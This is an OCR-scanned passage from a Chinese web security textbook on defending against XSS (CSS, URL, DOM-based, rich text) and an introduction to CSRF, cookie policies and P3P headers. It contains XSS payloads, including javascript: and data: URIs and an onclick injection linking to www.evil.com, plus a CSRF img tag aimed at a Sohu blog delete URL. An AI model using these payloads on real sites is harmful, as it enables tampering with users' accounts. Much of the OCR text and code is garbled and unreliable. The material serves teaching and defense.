<STYLE>li {list-style-image: 
url("javascript:alert('XSS')");}</ 
STYLEASULSSET?XSS 

«DIV STYLE- "background-image: 
url(javascript: alert('XSS'))"> 

<DIV STYLE-"width: 
expression(alert('XSS'));" 


所 以 ， Bout 尽 可 能 禁止 用 户 可 控制 的 变量 在 “<style> 标 
0. “HTML 标签 的 style 属 性 ”以 及 “CSS 文 件 ”* 中 输出 。 如 果 一 定 有 这 
祥 的 需 了 求 ， 则 推荐 使 用 OWASP ESAPI 中 的 encodeForCSSO 画 数 。 


String safe = 
ESAPI. encoder (). encodeForCSS( request .getPara 
meter( "input" ) ); 


ECSCHJR EE FESAPI.encoder().encode-ForJavaScriptO Hat, BR f F 
` 数字 外 的 所 有 字符 都 被 编码 成 十 六 进 制 形式 AuHH”。 在 地 址 中 输 


在 地 址 中 输出 也 比较 复杂 。 一 般 来 说 ， 在 URL 的 path (路 径 ) 或 者 
search (参数 ) 中 输出 ， 使 用 URLEncode 即 可 。URLEncode 会 将 字符 
转换 为 “%HH” 形 式 ， 比如 空 3 格 就 是 “%20”，“<” 符 号 是 “%3c”。 


«a hrefz"http://www.evil.com/?test-$var" 
>test</a> 


可 能 的 攻击 方法 : 


«a href="http://www.evil.com/?test=" 
onclick=alert(1)"" >test</a> 


经 过 URLEncode 后 ， 变 成 了 : 


«a href="http://www.evil.com/?test= 
%22%200nclick%3balert%281%29%22" >test</a> 


但 是 还 有 一 种 情况 ， 就 是 整个 URL 能 够 被 用 户 完 全 控制 。 这 时 URL 的 
Protocal 和 Host 部 分 是 不 能 够 使 用 URLEncode 有 的， 否则 会 改变 URL 的 语 
yX. o 

一 个 URL 的 组 成 如 下 : 


[Protocal][Host][Path][Search] [Hash] 


例如 : 


https://www. on con/a/b/c/test?abe- 1234ssss 
[Protocal] = 

[Host] = "www. PUR com" 

[Path] = "/a/b/c/test" 

[Search] = "?abc-123" 

[Hash] = "#ssss" 


在 Protocal 与 Host 中 ， 如 果 使 用 严格 的 UR-LEncode K žr, M S 
di ess “» 等 都 编码 掉 。 


对 于 如 下 的 输出 方式 : 

攻击 者 可 能 会 构造 伪 协 议 实施 攻击 : 

KR 了 “javascript? 作为 伪 协 议 可 以 执行 代码 外 ， 还 
有 “vbscript”、“dataURI” 等 伪 协 议 可 能 导致 脚本 执行 。“dataURI” 这 个 
伪 协 议 是 Mozilla 所 支持 的 ， 能 够 将 一 段 代码 写 在 URL 里 。 如 下 例 : 


A 


a href="data:text/ 

html; base64, PHNjcmlwdD5hbGVydCgxKTs8L3Njcmlwd 

D4=">test</a> 
这 段 代 码 的 意思 是 ， 以 texthtml 的 格式 加 载 编码 为 base64 的 数据 ， 加 载 
完成 后 实际 上 是 : 

<script>alert(1);</script> 


点 击 <a> 标 签 的 链接 ， 将 导致 执行 脚本 。 


执行 恶意 脚本 


由 此 可 见 ， 如 果 用 户 能 够 完全 控制 URL， 则 可 以 执行 脚本 的 方式 有 很 

多 。 如 何 解 决 这 种 情况 呢 ? 

一 般 来 说 ， 如 果 变 量 是 整个 URL， 则 应 该 先 检查 变量 是 否 以 “http” 开 头 
(如 果 不 是 则 自动 添加 ) ， 以 保证 不 会 出 现 伪 协议 类 的 XSS 攻 击 。 

人 
ye 

UREN ee eee el 

fil) : 


String safe = 
ESAPI.encoder().encodeForURL( request.getPara 
meter( "inpu 


t" ) ); 


3.3.5 “处理 富 文本 

有 些 时 候 ， 网 站 需要 人 允许 用 户 提交 一 些 自 定义 的 HTML 代 码 ， 称 之 
为 “ 富 文 本 。 比 如 一 个 用 户 在 论坛 里 发 帖 ， 帖 子 的 内 容 里 要 有 图 片 、 
视频 ， 表 格 等 ， 这 些 “ 寅 文本 ”的 效果 都 需要 通过 HTML 人 代码 来 实现 。 
如 何 区 分 安全 的 “ 富 文本 > 和 有 攻击 性 的 XSS 昵 ? 

在 处 理 襄 文本 时 ， 还 是 要 回 到 “输入 检查 ”的 思路 上 来 。“ 和 输入 检查 ”的 
主要 问题 是 ， 在 检查 时 还 不 知道 变量 的 输出 语 境 。 但 用 户 提交 的 “ 富 文 
本 ”数据 ， 其 语义 是 完整 的 HTML 代 码 ， 在 输出 时 也 不 会 拼凑 到 某 个 标 
签 的 属性 中 。 因 此 可 以 特殊 情况 特殊 处 理 。 

在 上 一 廊 中 ， 列 出 了 所 有 在 HTML 中 可 能 执行 脚本 的 地 方 。 而 一 个 优 
2 1 PURIS 也 应 该 能 够 找 出 HTML 代 人 码 中 所 有 可 能 执行 脚本 的 
HTML 是 一 种 结构 化 的 语言 ， 比 较 好 分 析 。 通 过 htmlparser 可 以 解析 出 
HTML 代 码 的 标签 、 标 签 属性 和 事件 。 

在 过 滤 富 文本 时 , “事件” 应 该 被 严格 禁止 ， 因 为 “ 富 文 本 ”的 展示 需求 
里 不 应 该 包括 “事件 ”* 这 种 动态 效果 。 而 一 些 危 险 的 标签 ， 比 如 
<iframe>、<script>、<base>、<form> 等 ， 也 是 应 该 严格 禁止 的 。 

在 标签 的 选择 上 ， 应 该 使 用 日 名 单 ， 避 免 使 用 黑 名 单 。 比 如 ， 只 允许 
<a> ^ <img> ^ «div» Se ELE EP HYS HERE ° “AB FR JEU INCDUS 
于 标签 的 选择 ， 同 样 应 该 用 于 属性 与 事件 的 选择 。 

在 语文 本 过 滤 中 ， 处 理 CSS 也 是 一 件 厅 烦 的 事情 。 如 果 人 允许 用 户 自 定 
义 CSS、style， 则 也 可 能 导致 XSS 攻 击 。 因 此 尽 可 能 地 禁止 用 户 自 定义 
CSS 与 style。 

如 宁 一 定 要 允许 用 户 目 定义 样式 ， 则 只 能 像 过 滤 “ 富 文本 ”一 样 过 
滤 “CSS”。 这 需要 一 个 CSSParser 对 样式 进行 智能 分 析 ， 检 查 其 中 是 否 
包含 危险 代码 。 

有 一 些 比较 成 熟 的 开源 项 目 ， 实 现 了 对 定 文 本 的 XSS 检 查 。 
Anti-Samy 是 OWASP 上 的 一 个 开源 项 目 ， 也 是 目前 最 好 的 XSS Filter ° 
最 早 它 是 基于 Java 的 ， 现 在 已 经 扩展 到 .NET 等 语言 。 


mport org.owasp.validator.html.*; 
i icy = 


etInstance(POLICY FILE LOCATION); 
- new AntiSamy(); 
ults cr - as.scan(dirtyInput, 


在 PHP 中 ， 可 以 使 用 另外 一 个 广 受 好 评 的 开源 项 目 : HIMLPurify ° 


3.3.6 ”防御 DOM Based XSS 


DOM Based XSS 是 一 种 比较 特别 的 XSS 漏 润 ， 前 文 提 到 的 儿 种 防御 方 
夫 都 不 太 适 用 ， 需 要 特别 对 待 。 


DOM Based XSS 是 如 何 形 成 的 呢 ? 回头 看 看 这 个 例子 : 


<script> 
een test(){ 
var str 
document. getElementById(" text").value; 
document.getElementById("t"). innerHTME = 
"<a href='"+str+"' >testLink</a> 


</script> 

<div id="t" ></div: 

<input type=" " text" ae "text" value- /> 
«input type- oe. id="s" value="write" 
onclick="test()" 


在 button 的 onclick 事 件 中 ， 执行 了 test0 函 数 ， 而 该 画 数 中 最 关键 的 一 名 
是 . 


document. getElementById(" t" ). nner HTML = "<a 
href='"+str+"' >testLink</a> 


将 HTML 代 码 写 入 了 DOM 节 点 ， 最 后 导致 了 XSS 的 发 生 。 


事实 上 ，DOM Based XSS 是 从 JavaScript 中 输出 数据 到 HTML 页 面 里 。 
而 前 文 提 到 的 方法 都 是 针对 “从 服务 袁 应 用 直接 输出 到 HIML 页面 ”的 
XSS 漏 洞 ， 因 此 并 不 适用 于 DOM Based XSS ° 


看 看 下 面 这 个 例子 : 


«script» 

var x="$var 

document. write(" «a hrefz'"«x«"' >test</a>"); 
«/script» 


变量 “$var” 输 出 在 <script> 标 签 内 ， 可 是 最 后 又 被 document.write 输 出 到 
HTML 页 面 中 。 


假设 为 了 保护 “$var" 直 接 在 <script> 标 签 内 产生 XSS， 服 务 器 端 对 其 进行 


了 javascriptEscape。 可 是 ，$var 在 document.write 时 ， 仍 然 能 够 产生 
XSS， 如 下 所 示 : 


«script» 


var x="\x20\x27onclick\x3dalert\x281\x29\x3b 
NX2fNX2fNX27" ; 

document.write("«a href='"+x+"' >test</a>"); 
</script> 


HEMER JS BUSEERERAR A P: 


"XC Bus mu- cst NAR bor FR Kesis Ceres 


页 面 泻 染 后 的 HTML 代 码 效果 


XSS 攻 击 成 功 : 


PUT REG 

其 原因 在 ， 第 一 次 执行 javascriptEscape 后 ， 只 保护 了 : 

但 是 当 document.write 输 出 数据 到 my LJU 页 面 时 ， 浏 览 器 重新 泻 染 了 页 
面 。 在 <script> 标 签 TUM 已 经 对 变量 x 进行 了 解码 ， 其 后 docu- 
ment.write 再 运行 时 ， 其 参数 就 变 T. 


«a href=' 'onclick-alert(1);//'' >test</a> 


XSS 因 此 而 产生 。 


ASA eA AMT “Svar HTE SoS Ree? 如 果 改 成 HtmlEncode 会 怎么 
FE? 继续 看 下 面 这 个 例子 : 


«script» 


X=" 1&#X22; &#X29; &axab; alert&#x28 ; 2&#x29 ; &#x3b 
1 &#X2F; RHX2F &RHX22; 

document. write("«a href= # 
onclick='alert(\""+x+"\")' >test</a>"); 
</script> 


服务 器 把 变量 HtmlEncode 后 再 输出 到 <script> 中 ， 然 后 变量 x 作为 ondlick 
事件 的 一 个 函数 参数 被 document.write 到 了 HTML 页 面 里 。 


* —— a ———M 
€ a S d | HTMLv | C5S MA DOM Wii Events Cookies 


E Aa body html 


=) «html? 
<head> </head> 


[2 «script? 


k 
var z=”1%#z22.k#z29;%#z3bialertk#z28;24#229;k#z3b;k#z2f;k#r2f,k#z22;“; 
3. document. write(“<a href=# onclick= alert(\"*+tzt"\")’ >test</a>"); 
script? 
<a onclick=“alert ("1") ;alert(2);//"")" href="#"> test </a> 
</body> 
</html> 


页 面 泻 染 后 的 HTML 代码 效果 


执行 恶意 代码 

那么 正确 的 防御 方法 是 什么 呢 ? 

首先 ， 在 “$var”* 输 出 到 <script> 时 ， 应 该 执行 一 次 javascriptEncode; 其 
次 ， 在 docu-ment.write 输 出 到 HTML 页 面 时 ， 要 分 具体 情况 看 待 : 如 果 
是 输出 到 事件 或 者 脚本 ， 则 要 再 做 一 次 javascriptEncode; 如 果 是 输出 到 
HTMEL 内 容 或 者 属性 ， 则 要 做 一 次 HtmlEncode ° 

也 就 是 说 ， 从 JavaScript 和 输出 到 HTML 页 面 ， 也 相当 于 一 次 XSS 输 出 的 过 
程 ， 需 要 分 语 境 使 用 不 同 的 编码 函数 。 


«t 


ail Pp SG F a 
| 


| | 


document write(): | F 
imeHIML || 


DOM based XSS 的 防御 


会 触发 DOM Based XSS 的 地 方 有 很 多 ， 以 下 几 个 地 方 是 JavaScript 输 出 
到 HTML 页面 的 必 经 之 路 。 


document.write() 
document.writeln() 
xxx.innerHTML- 
xxx.outerHTML= 
innerHTML.replace 
document.attachEvent() 
window.attachEvent() 


e document.location.replace() 
。 document.location.assign() 


需要 重点 关注 这 几 个 地 方 的 参数 是 否 可 以 被 用 户 控制 。 
除了 服务 器 端 直接 输出 变量 到 JavaScript 外 ， 还 有 以 下 几 个 地 方 可 能 会 
成 为 DOM Based XSS 的 输入 点 ， 也 需要 重点 关注 。 


页 面 中 所 有 的 inputs 框 
window.location(href、hash 等 ) 
window.name ?document.referrer 
document.cookie ?localstorage 
XMLHttpRequest 返 回 的 数据 


安全 研究 者 Stefano Di Paola 设 立 了 一 个 DOM Based XSS 的 cheatsheet , 
有 兴趣 深入 研究 的 读者 可 以 参考 。 


3.3.7 ”换个 角度 看 XSS 的 风险 

前 文 谈 到 的 所 有 XSS 攻 击 ， 都 是 从 漏洞 形成 的 原理 上 看 的 。 如 果 从 业 
务 风 险 的 角度 来 看 ， 则 会 有 不 同 的 观点 。 

一 般 来 说 ， 存 储 型 XSS 的 风险 会 高 于 反射 型 XSS。 因 为 存储 型 XSS 会 保 
存在 服务 器 上 ， 有 可 能 会 跨 页 面 存 在 。 它 不 改变 页 面 URL 的 原 有 结 
构 ， 因 此 有 了 时候 还 能 逃 过 一 些 IDS 的 检测 。 比 如 IE 8 的 XSS Filter Fil 
Firefox 的 Noscript Extension， 都 会 检查 地 址 栏 中 的 地 址 是 否 包含 XSS 脚 
本 。 而 跨 页 面 的 存储 型 XSS 可 能 会 绕 过 这 些 检测 工具 。 

从 攻击 过 程 来 说 ， 反 射 型 XSS， 一 般 要 求 攻击 者 诱 使 用 户 点 击 一 个 包 
含 XSS 代 码 的 URL 链 接 ， 而 存储 型 XSS， 则 只 需要 让 用 户 查 看 一 个 正 
常 的 URL 链 接 。 比 如 一 个 Web 邮 箱 的 邮件 正文 页 面 存在 一 个 存储 型 的 
XSS 漏 洞 ， 当 用 户 打 开 一 封 新 邮件 时 ，XSS Payload 会 被 执行 。 这 样 的 
漏洞 极其 隐蔽 ， 且 埋伏 在 用 户 的 正常 业务 中 ， 风 险 颇 高 。 

从 风险 的 角度 看 ， 用 户 之 间 有 互动 的 页 面 ， 是 可 能 发 起 XSS Worm 攻 
击 的 地 方 。 而 根据 不 同 页 面 的 PageView 高 低 ， 也 可 以 分 析出 哪些 页 面 
受 XSS 攻 击 后 的 影响 会 更 大 。 比 如 在 网 站 首页 发 生 的 XSS 攻 击 ， 肯 定 
比 网 站 合作 伙伴 页 面 的 XSS 攻 击 要 严重 得 多 。 

在 修补 XSS 漏 洞 时 遇 到 的 最 大 挑战 之 一 是 漏洞 数量 太 多 ， 因 此 开发 者 
可 能 来 不 及 ， 也 不 愿意 修补 这 些 漏洞 。 从 业务 风险 的 角度 来 重新 定位 
每 个 XSS 漏 洞 ， 就 具有 了 重要 的 意义 。 


3.4 “人 小结 

本 章 讲 述 了 XSS 攻 击 的 原理 ， 并 从 开发 着 的 角度 阐述 了 如 何 防御 
XSS ° 

理论 上 ，XSS 漏 洞 虽然 复杂 ， 但 却 是 可 以 彻底 解雇 的 。 在 设计 XSS 解 
决 方案 时 ， 应 该 深入 理解 XSS 攻 击 的 原理 ， 针 对 不 同 的 场景 使 用 不 同 
的 方法 。 同 时 有 很 多 开源 项 目 为 我 们 提供 了 参考 。 


第 4 章 ” 跨 站 点 请 求 伪造 (CSRF) 


CSRF p 全 名 是 Cross Site RequestForgery， 翻 译 成 中 文 就 是 跨 站 点 请 求 
伪造。 它 是 一 种 常见 的 Web 攻 击 ， 但 很 多 开发 者 对 它 很 卫生 。CSRF 世 
是 Web 安 全 中 最 容易 被 忽略 的 一 种 攻击 方式 ， 甚 至 很 多 安全 工程 师 都 
不 太 理 解 它 的 利用 条 件 与 危害 ， 因 此 不 予 重视 。 但 CSRF 在 某 些 时 候 却 
能 够 产生 强大 的 破坏 性 。 


41 CSRF 简 介 


什么 是 CSRF 呢 ?我 们 先 看 一 个 例子 。 
还 记得 在 “ 跨 站 脚本 攻击 ”一 章 中 ， 介 绍 XSSPayload 时 的 那个 “删除 搜狐 
博客 ”的 例子 吗 ? 登录 Sohu 博 客 后 ， 只 需要 请 求 这 个 URL ， 就 能 够 把 编 
号 为 “156713012” 的 博客 文章 删除 。 


http://blog.sohu.com/manage/entry.do? 


m=delete&id=156713012 


这 个 URL 同 时 还 存在 CSRF 漏 润 。 我 们 将 尝试 利用 CSRF 漏 洞 ， 删 除 编 


号 为 “156714243* 的 博客 文章 。 这 篇 文章 的 标题 是 “test1”。 
ULIS ay #_# 有 些 困 【jitestlte,，Y 


testltest] 首页 日 去 mu 相册 视频 档案 我 的 空间 


testltest1 


^s 我 的 空间 
c He BE 


id 85 
P br 


搜狐 博客 个 人 管理 界面 


我 的 空间 。 我 的 博客 SHE 


日 志 


评论 


选择 分 类 : 全 部 5| 


日 其 
2010-07-19 
2010-07-19 


2010-07-19 


test 


aaaaaaaaa 


test1 


攻击 者 首 先 在 目 己 的 域 构 造 一 个 页 面 : 


http://www.a.com/csrf.html 


«img src="http://blog.sohu.com/manage/ 


entry.do?m-delete&id-156714243" /» 


文章 标题 


删除 


使 用 了 一 个 <img> 标 签 ， 其 地 址 指向 了 删除 博客 文章 的 链接 。 
攻击 者 诱 使 目标 用 户 ， 也 就 是 博客 主 “testltest* 访 问 这 个 页 面 ; 
D Y [ = ; = 3 -历史 c Eas (m I 部 助 = — = 


执行 CSRF 攻 击 
该 用 户 看 到 了 一 张 无 法 显示 的 图 片 ， 再 回 过 头 看 看 搜狐 博客 : 


搜狐 博客 Rs eue. » AAG RES SES. Hk M 


testltest] 首页 Hi we 相册 视频 档案 我 的 空间 


testitest1 


^ RHE og AE 


SOS 
| Ae g Be || Hb || Be || oe |) 88 
BU it ounce 
ü 
选择 分 类 : 全 部 中 
af 
M " 日 其 文章 标题 修改 wR 
i ^ 
2010-07-19 test Fa X 
(4 8s 
2010-07-19 333333333 Fa x 
p og 
& 1 


文章 被 删除 
发 现 原 来 存在 的 标题 为 “test1” 的 博客 文章 ， 已 经 被 删除 了 1! 


原来 刚才 访问 http://www.a.com/csrf.html 时 ， 图 片 标签 向 搜狐 的 服务 器 


E k HIML CSS Hk DOK LES | Events Cookies 


ML | 清除 保持 | FUN HNL CSS Js WR EA Flashi 
URL T1 (X^ ”时 间 线 


= GET csrf.html 200 Ok a.com 72B | 
由 GET entry.do?m=delete&id=15 302 Moved Temporarily blog.sohu.com 84B 
248k 156B 
E ` 
CSRF 请 求 


而 这 次 请 求 ， 导 致 了 搜狐 博客 上 的 一 篇 文章 被 删除 。 
回顾 整个 攻击 过 程 ， 攻 击 者 仅仅 诱 使 用 户 访 问 了 一 个 页 面 ， 束 以 该 用 
户 身 份 在 第 三 方 站 点 里 执行 了 一 次 操作 。 试 想 : 如 有 果 这 张 独 片 是 展示 
在 茶 个 论坛 、 某 个 博客 ， 甚 至 搜狐 的 一 些 用 户 空间 中 ， 会 产生 什么 戏 
果 呢 ?只 需要 经 过 精心 的 设计 ， 束 能 够 起 到 更 大 的 破坏 作用 。 

这 个 删除 博客 文章 的 请 求 ， 是 攻击 者 所 伪造 的 ， 所 以 这 种 攻击 就 叫 
做 “ 跨 站 点 请 求 伪 造 ”。 


42 CSRE 进 阶 


4.2.1 浏览 器 的 Cookie 策 略 

在 上 市 提 到 的 例子 里 ， 攻 击 者 伪造 的 请 求 之 所 以 能 够 被 搜狐 服务 絮 验 
证 通过 ， 是 因为 用 户 的 浏览 絮 成 功 发 送 了 Cookie 的 缘故 。 

洲 蜗 器 所 持 有 的 Cookie 分 为 两 种 ， 一 种 是 “Session Cookie”， 又 称 “|I 临 时 
Cookie"; 男 一 种 是 “Third-party Cookie”， 也 称 为 “本 地 Cookie”。 

两 者 的 区 别 在 于 ，Third-party Cookie 是 服务 器 在 Set-Cookie 时 指定 了 
Expire 时 间 ， 只 有 到 了 Expire 时 间 后 Cookie 才 会 失效 ， 所 以 这 种 Cookie 
会 保存 在 本 地 ; 而 Session Cookie 则 没有 指定 Ex-pire 时 间 ， 所 以 浏览 器 
KAIA, Session Cookiet RRL fF ° 

FA bt AIA A, ETS ABT Session Cookie, 35/4 TE1XJ 
Shane MEH ape, BHEN asat] | Tabl, Session Cookiett 
都 是 有 效 的 。Session Cookie £F TET Rar AEN AN 442 [a] Hn; 而 Third- 
party Cookie 则 保存 在 本 地 。 

如 果 浏 览 器 从 一 个 域 的 页 面 中 ， 要 加 载 男 一 个 域 的 资源 ， 由 于 安全 原 
因 ， 某 些 浏览 器 会 阻止 Third-party Cookie 的 发 送 。 

下 面 这 个 例 了 于， 演示 了 这 一 过 程 。 

在 http:/www.a.com/cookie.php 中 ， 会 给 浏览 器 写 入 两 个 Cookie: 一 个 为 
Session Cookie， 男 一 个 为 Third-party Cookie ° 


ookie: cookie1=123;"); 
-Cookie kie2=456;expires=Thu, 
0:0 


访问 这 个 页 面 ， 发 现 浏览 套 同 时 接收 了 这 两 个 Cookie 。 


p 


Overview | Time Chart | Headers Cookies | Cache | Query String | POST Data| Content | Strean | 


: coo = 
0:01 GMT;", false); 


pires 
cookiel Received 123 www.a.com (Session) 
cookie2 Received 456 l www,a,com Thu, 01-Jan-2030 00:00:01 GMT 


iil i, ael Cookie 
这 时 再 打开 一 个 新 的 浏览 器 Tab 页 ， 访 问 同一 个 域 中 的 不 同 页 面 。 因 为 
新 Tab 页 在 同一 个 浏览 器 进程 中 ， 因 此 Session Cookie 将 被 发 送 。 


403 Forbidden — Findowrs Internet Explorer 


Geox B nit i fire: a icon 


| zD AEO SEW wea) IAM Bap 
vor RER (B http://www. a. comf cook... e 403 Forbidden x 


Forbidden 


You don't have permission to access / on this server. 


Apache/2.0.63 (Win32) PHP/3.2.6 Server at www.a.com Port 80 


X @ record [Stop fE] Clear ET View v <2 Summary Q Find + Y, Filter Dd - 2) We 


Overview | Time Chart | Headers Cookies | Cache | Query String | POST Data| Content | Stream | 


cookie1 Sent 123 


tch Professional 5.1 


wiwiw.a.com (Session) 
cookie2 Sent 456 l wawa com Tue, 01-Jan-2030 00:00:01 GMT 
Session Cookie 被 发 送 


此 时 在 男 外 一 个 域 中 ， 有 一 个 页 面 http://www.b.com/csrf-test.html， 此 页 
面 构 造 了 CSRF 以 访问 www.a.com ° 


<iframe src="http://www.a.com" ></iframe> 


这 时 却 会 发 现 ， 只 能 发 送出 Session Cookie, Mi Third-party Cookie 被 禁 
IET ° 


3 E 
Overview | Time Chart | Headers Cookies | Cache | Query String | POST Data| Content | Stream | 


Cookie... -|orexen] vele [path [peman — : 


cookiel Sent 123 WwWw,a,com (Session) 


只 发 送 了 Session Cookie 
这 是 因为 正 出 于 安全 考 感 ， 轩 E IET wl ot as fe <img> ^ <iframe> ^ 
«script» ^ «link» SE phas rp A XS 58 — 77 Cookie 。 


Ere ALME 。 在 Firefox 中 ， 默 认 舍 略 是 允许 发 送 第 
三 方 Cookie 的 。 


Wr : == 
F pag ma css Mx DOM | 网络 v | Events Cookies 


AE | 清除 GE | 所 有 HTML CSS JS XHR 图 片 Flash g 
URL RE Hu X^ Wag 
由 GET csrf-test.html 304 Not Modified b.com 41B | 
El GET www.a.com 403 Forbidden a.com 286 B 
Headers mf 4 Cookies 
me LES 


Date Tue, 24 Aug 2010 08:53:43 CMT 
Server Apache/2.0.63 (min32) PHP/5. 2.6 
Content-Length 286 
Keep-Alive timeout=15, maz=99 
Connection Keep-Alive 
Content-Type text/html; charset=iso-8859-1 


HERBS 


Host wvv. a. com 
User-Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefoz/3.6.8 
Accept text/html, application/zhtml*zml, application/zml;q=0. 9, */*; gq=0, 8 
Accept-Language zh-cn 
Accept-Encoding ezip, deflate 
Accept-Charset 652312, utf-8; qz0. T, *; qz0. T 
Keep-Alive 115 
Connection keep-alive 
Refere -test.html 


pokie cookiei-123; cokla 458 


Cache-Control maz-age- 


在 Firefox 中 人 允许 发 送 第 三 方 Cookie 

由 此 可 见 ， 在 本 章 一 开始 所 举 的 CSRF 攻 击 案例 中 ， Bal 79 F8 PHS RS 
是 Firefox， 所 以 能 够 成 功 发 送 用 于 认证 的 Third-party Cookie, #2421 
CSRF 攻 击 成 功 。 


MY TEN bias, DAA DMA, bea EA PUE 
= ae 中 先 访问 目标 站 点 ， 使 得 Session Cookie 有 效 ， 再 实施 CSREF 
Bes 

T£ ABB EV boas, BAVA Third-party Cookie 的 有 : IE 6 ^ IE 
7^ IE 8^ Safari; 不 会 拦截 的 有 : Firefox 2 ^ Firefox 3 ^ Opera ^ 
GoogleChrome ` Android® ° 

但 和 若 CSRF 攻 击 的 目标 并 不 需要 使 用 Cookie， 则 也 不 必 有 顾虑 浏览 器 的 
Cookie? ig f ° 

42.2 ”了 P3P 头 的 副作用 

尽管 有 些 CSRF 攻 击 实施 起 来 不 需要 认证 ， 不 需要 发 送 Cookie， 但 是 不 
可 否认 的 是 ， 大 部 分 敏感 或 重要 的 操作 是 躲藏 在 认证 之 后 的 。 因 此 浏 
哆 器 拦截 第 三 方 Cookie 的 发 送 ， 在 某 种 程度 上 来 说 降低 了 CSRF 攻 击 的 
威力 。 可 是 这 一 情况 在 *P3P 头 ”介入 后 变 得 复杂 起 来 。 

P3P Header 是 WwW3C 制 定 的 一 项 关于 隐私 的 标准 ， 全 称 是 The Platform for 
Privacy Prefer-ences。 

如 果 网 站 返回 给 浏览 器 的 HTTP 头 中 包含 有 P3P 头 ， 则 在 某 种 程度 上 来 
Ví, KFN Ua A KB = FT Cookie » TEIE F ENIE Z& «iframe» ^ 
<script> 等 标签 也 将 不 再 拦截 第 三 方 Cookie 的 发 送 。 

在 网 站 的 业务 中 ，P3P 头 主要 用 于 类 似 广告 等 需要 跨 域 访问 的 页 面 。 但 
是 很 遗憾 的 是 ，P3P 头 设置 后 ， 对 于 Cookie 的 影响 将 扩大 到 整个 域 中 的 
所 有 页 面 ， 因 为 Cookie 是 以 域 和 path 为 单位 的 ， 这 并 不 符合 “最 小 权 
限 *” 原 则 。 

假设 有 www.a.com 与 www.b.com 两 个 域 ， 在 www.b.com 上 有 一 个 页 面 ， 
其 中 包含 一 个 指向 www.a.com 的 iframe ° 


http://www.b.com/test.html 的 内 容 为 : 
<iframe width-300 height=300 

src="http://ww. test.php" ></iframe> 
http://www.a.com/test.php 是 一 个 对 a.com 域 设置 Cookie 的 页 面 ， 其 内 容 为 : 


当 请 求 http://www.b.com/test.html 时 ， 它 的 iframe 会 告诉 浏览 絮 去 里 域 请 
求 www.a.comytestphp。test.php 会 答 试 Set-Cookie， 所 以 浏览 器 会 收 到 
MUR A 
l'Cookie 

lll 5&Set-CookieEZ], FRI RIANA, Mba M_IZS ACIE ACRI ES] 
Cookie。 可 是 由 于 跨 域 限制 ， 在 a.com 上 Set-Cookie 是 不 会 成 功 的 ， 所 以 
无 法 发 送 刚 才 收 到 的 Cookie。 这 里 无 论 是 临时 Cookie 还 是 本 地 Cookie 
都 一 样 。 测 试 环 境 请 求 过 程 


可 以 看 到 ， 第 二 次 发 包 ， 只 是 再 次 接收 到 了 Cookie， 上 次 Set-Cookie 的 
值 并 不 曾 发 送 ， 说 明 没 有 Set-Cookie 成 功 。 但 是 这 种 情况 在 加 入 了 P3P 
头 后 会 有 所 改变 ，P3P 头 允许 器 域 访问 隐私 数据 ， 从 而 可 以 路 域 Set- 
Cookie 成 功 。 

修改 www.a.com/test.php 如 下 : 


?php 
header("P3P: CP-CURa ADMa DEVa PSAo PSDo OUR 
BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI 
DSP COR"); 
header("Set-Cookie: test=axis; expires=Sun, 
23-Dec-2018 08:13:02 GMT; domain= .a.com; 
pus "13M 


再 次 重复 上 面 的 测试 过 程 : 测试 环境 请 求 过 程 
可 以 看 到 ， 第 二 个 包 成 功 发 送出 之 前 收 到 的 Cookie 。 
P3P 头 的 介入 改变 了 a.com 的 隐私 案 略 ， 从 而 使 得 <iframe>、<script> 等 


标签 在 IE 中 不 青 拦截 第 二 方 Cookie 的 发 送 。P3P 头 只 需要 由 网 站 设置 一 
次 即 可 ， 之 后 每 次 请 求 都 会 遵循 此 策略 ， 而 不 需要 再 重复 设置 。 


P3P 的 策略 看 起 来 似乎 很 难 人 ， 但 其 实 语法 很 商 单 ， 都 是 一 一 对 应 的 天 
系 ， 可 以 查询 W3C 标 准 。 比如 

CP Æ Compact Policy 的 简写 ; CURa CUR 是 <current/> 的 简写 ; a 是 
always 的 人 简写。 如 下 表 : 


[57] compact-purpose = "CUR" For 
<current/> 

"ADM" [creq ; for «admin/» 

"DEV" [creq ; for «develop/» 

"TAI" [creq ; for «tailoring/» 

"PSA" [creq ; for «pseudo-analysis/» 

"PSD" [creq ; for «pseudo-decision/» 

"IVA" [creq ; for «individual- 
analysis/ 

"IVD" [creq ; for «individual- 
decision/» 

'CON" [creq ; for «contact/» 

HIST [creq ; for «historical/» 

"TEL" [creq ; for «telemarketing/» 

"OTP" [creq ; for «other-purpose/» 
[58] xi = Ela ;"always" 

"op in" 
"o" "opt-out" 


此 外 ，P3P 头 也 可 以 直接 引用 一 个 XML 策略 文件 : 


HTTP/1.1 200 OK 

P3P: policyref="http://catalog.example.com/ 
P3P/PolicyReferences.xml" 

Content-Type: text/html 

Content-Length: 7413 

Server: CC-Galaxy/1.3.18 


若 想 了 解 更 多 的 关于 P3P 头 的 信息 ， 可 以 参考 W3C 标 准 。 
正 因 为 P3P 头 目前 在 网 站 的 应 用 中 被 广泛 应 用 ， 因 此 在 CSRE 的 防御 中 
不 能 依赖 于 浏览 器 对 第 三 方 Cookie 的 拦截 策略 ， 不 能 心 存 侥幸 。 
很 多 时 候 ， 如 果 测 试 CSRF 时 发 现 <iframe> 等 标签 FETE TE ER BAC TA 
Cookie， 而 又 找 不 到 原因 ， 那 么 很 可 能 就 是 因为 P3P 头 在 作怪 


4.2.3 GET? POST? 


在 CSRF 攻 击 流行 之 初 ， 曾 经 有 一 种 错误 的 观点 ， 认 为 CSRF 攻 击 只 能 
由 GET 请 求 发 起 。 因 此 很 多 开发 者 都 认为 只 要 把 重要 的 操作 改 成 只 人 允 
许 POST 请 求 ， 丈 能 防止 CSRF 攻 击 。 

这 种 错误 的 观点 形成 的 原因 主要 在 于 ， 大 多 数 CSRF 攻 击发 起 时 ， 使 用 
的 HTML 标 签 都 是 <img>、<iframe>、<script> 等 带 “sre”* 属 性 的 标签 ， 这 
类 标签 只 能 够 发 起 一 次 GET 请 求 ， 而 不 能 发 起 POST 请 求 。 而 对 于 很 多 
网 站 的 应 用 来 说 ， 一 些 重要 操作 并 未 严格 地 区 分 GET 与 POST， 攻 击 者 
可 以 使 用 GET 来 请 求 表单 的 提交 地 址 。 比 如 在 PHP 中 ， 如 果 使 用 的 是 
$ REQUEST, ifjdE$ POST 获取 变量 ， 则 会 存在 这 个 问题 。 

对 于 一 个 表单 来 说 ， 用 户 往 往 也 就 可 以 使 用 GET 方 式 提交 参数 。 比 如 


以 下 表单 : 
